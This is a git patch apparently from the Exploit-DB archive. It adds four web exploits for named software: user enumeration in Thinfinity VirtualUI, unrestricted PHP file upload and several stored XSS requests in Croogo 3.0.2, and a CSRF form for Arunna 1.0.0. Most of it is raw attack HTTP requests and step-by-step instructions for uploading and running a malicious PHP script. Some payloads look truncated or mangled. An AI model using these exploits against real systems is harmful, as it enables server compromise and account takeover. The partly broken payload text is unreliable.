From 929e2549452fb71fcd442b0964dd7221c31177d1 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 17 Dec 2021 05:01:54 +0000 Subject: [PATCH] DB: 2021-12-17 4 changes to exploits/shellcodes Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration Croogo 3.0.2 - Unrestricted File Upload Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS) Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF) --- exploits/multiple/webapps/50601.txt | 12 +++ exploits/php/webapps/50602.txt | 61 ++++++++++++++ exploits/php/webapps/50603.txt | 124 ++++++++++++++++++++++++++++ exploits/php/webapps/50608.html | 35 ++++++++ files_exploits.csv | 4 + 5 files changed, 236 insertions(+) create mode 100644 exploits/multiple/webapps/50601.txt create mode 100644 exploits/php/webapps/50602.txt create mode 100644 exploits/php/webapps/50603.txt create mode 100644 exploits/php/webapps/50608.html diff --git a/exploits/multiple/webapps/50601.txt b/exploits/multiple/webapps/50601.txt new file mode 100644 index 000000000..f06810fdb --- /dev/null +++ b/exploits/multiple/webapps/50601.txt @@ -0,0 +1,12 @@ +# Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration +# Date: 13/12/2021 +# Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed +# Vendor Homepage: https://www.cybelesoft.com +# Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ +# Version: vulnerable < v3.0 +# Tested on: Microsoft Windows +# CVE: CVE-2021-44848 + +How it works: By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of VirtualUI. Common users are administrator, admin, guest... +Payload: The vulnerable vector is "https://example.com/changePassword?username=USERNAME" where "USERNAME" need to be brute-forced. +Reference: https://github.com/cybelesoft/virtualui/issues/1 \ No newline at end of file diff --git a/exploits/php/webapps/50602.txt b/exploits/php/webapps/50602.txt new file mode 100644 index 000000000..b2773e098 --- /dev/null +++ b/exploits/php/webapps/50602.txt @@ -0,0 +1,61 @@ +# Exploit Title: Croogo 3.0.2 - Unrestricted File Upload +# Date: 06/12/2021 +# Exploit Author: Enes Özeser +# Vendor Homepage: https://croogo.org/ +# Software Link: https://downloads.croogo.org/v3.0.2.zip +# Version: 3.0.2 +# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3 + +==> 'setting-43' Unrestricted File Upload <== + +1- Login with your privileged account. +2- Click on the 'Settings' section. +3- Go to the 'Themes'. Directory is '/admin/settings/settings/prefix/Theme' +4- Choose a malicious php script and upload it. +5- Go to the '/uploads/(NAME).php' directory. You must change 'NAME' parameter with your filename you uploaded. +6- The malicious PHP script will be executed. + +POST /admin/settings/settings/prefix/Theme HTTP/1.1 +Host: (HOST) +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------360738881613175158033315978127 +Content-Length: 970 +Origin: http://(HOST) +Connection: close +Referer: http://(HOST)/admin/settings/settings/prefix/Theme +Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +-----------------------------360738881613175158033315978127 +Content-Disposition: form-data; name="_method" + +POST +-----------------------------360738881613175158033315978127 +Content-Disposition: form-data; name="_csrfToken" + +c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a +-----------------------------360738881613175158033315978127 +Content-Disposition: form-data; name="setting-43"; filename="malicious.php" +Content-Type: application/octet-stream + +$command"; +?> + +-----------------------------360738881613175158033315978127 +Content-Disposition: form-data; name="_Token[fields]" + +c4e0a45b25b5eaf8fa6e0e4ddcd3be00c621b803%3A +-----------------------------360738881613175158033315978127 +Content-Disposition: form-data; name="_Token[unlocked]" + + +-----------------------------360738881613175158033315978127-- \ No newline at end of file diff --git a/exploits/php/webapps/50603.txt b/exploits/php/webapps/50603.txt new file mode 100644 index 000000000..b60d7f034 --- /dev/null +++ b/exploits/php/webapps/50603.txt @@ -0,0 +1,124 @@ +# Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS) +# Date: 06/12/2021 +# Exploit Author: Enes Özeser +# Vendor Homepage: https://croogo.org/ +# Software Link: https://downloads.croogo.org/v3.0.2.zip +# Version: 3.0.2 +# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3 + +==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <== + +POST /admin/file-manager/attachments/add HTTP/1.1 +Host: (HOST) +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730 +Content-Length: 923 +Origin: http://(HOST) +Connection: close +Referer: http://(HOST)/admin/file-manager/attachments/add +Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +-----------------------------114221148012003093972656004730 +Content-Disposition: form-data; name="_method" + +POST +-----------------------------114221148012003093972656004730 +Content-Disposition: form-data; name="_csrfToken" + +c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a +-----------------------------114221148012003093972656004730 +Content-Disposition: form-data; name="file"; filename="file.txt" +Content-Type: + +Enes Ozeser (@enesozeser) +-----------------------------114221148012003093972656004730 +Content-Disposition: form-data; name="_Token[fields]" + +16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A +-----------------------------114221148012003093972656004730 +Content-Disposition: form-data; name="_Token[unlocked]" + + +-----------------------------114221148012003093972656004730-- + + +==> 'title' Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <== + +POST /admin/taxonomy/types/edit/5 HTTP/1.1 +Host: (HOST) +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 590 +Origin: http://(HOST) +Connection: close +Referer: http://(HOST)admin/taxonomy/types/edit/5 +Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a& +title=&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0& +comment_approve=1&comment_spam_protection=0&comment_captcha=0¶ms=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1& +format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply + + +==> 'title' Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <== + +POST /admin/blocks/regions/edit/3 HTTP/1.1 +Host: (HOST) +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 336 +Origin: http://(HOST) +Connection: close +Referer: http://(HOST)/admin/blocks/regions/edit/3 +Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a& +title=&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply + + +==> 'title' Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <== + +POST /admin/file-manager/attachments/edit/20 HTTP/1.1 +Host: (HOST) +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 363 +Origin: http://(HOST) +Connection: close +Referer: http://(HOST)/admin/file-manager/attachments/edit/20 +Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a& +title=&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply \ No newline at end of file diff --git a/exploits/php/webapps/50608.html b/exploits/php/webapps/50608.html new file mode 100644 index 000000000..2b309cd1a --- /dev/null +++ b/exploits/php/webapps/50608.html @@ -0,0 +1,35 @@ +# Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF) +# Date: November 29, 2021 +# Exploit Author: =(L_L)= +# Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/ +# Vendor Homepage: https://github.com/arunna +# Software Link: https://github.com/arunna/arunna +# Version: 1.0.0 +# Tested on: Ubuntu 20.04.2 LTS + + + +
+ + + + + + + + + + + + + + + + + + + + +
username[0]
select[0]
first_name[0]
last_name[0]
display_name[0]
one_liner[0]
location[0]
sex[0]
birthday[0]
birthmonth[0]
birthyear[0]
bio[0]
expertise[0][]
tags[0]
skills[0]
email[0]
website[0]
password[0]
re_password[0]
user_type[0]
status[0]
save_changes
\ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0e6463d7d..6637ea361 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44684,3 +44684,7 @@ id,file,description,date,author,type,platform,port 50595,exploits/hardware/webapps/50595.txt,"Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware, 50596,exploits/php/webapps/50596.txt,"meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,LiquidWorm,webapps,php, 50597,exploits/php/webapps/50597.txt,"Online Thesis Archiving System 1.0 - SQLi Authentication Bypass",1970-01-01,"Yehia Elghaly",webapps,php, +50601,exploits/multiple/webapps/50601.txt,"Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration",1970-01-01,"Daniel Morales",webapps,multiple, +50602,exploits/php/webapps/50602.txt,"Croogo 3.0.2 - Unrestricted File Upload",1970-01-01,"Enes Özeser",webapps,php, +50603,exploits/php/webapps/50603.txt,"Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Enes Özeser",webapps,php, +50608,exploits/php/webapps/50608.html,"Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,=(L_L)=,webapps,php,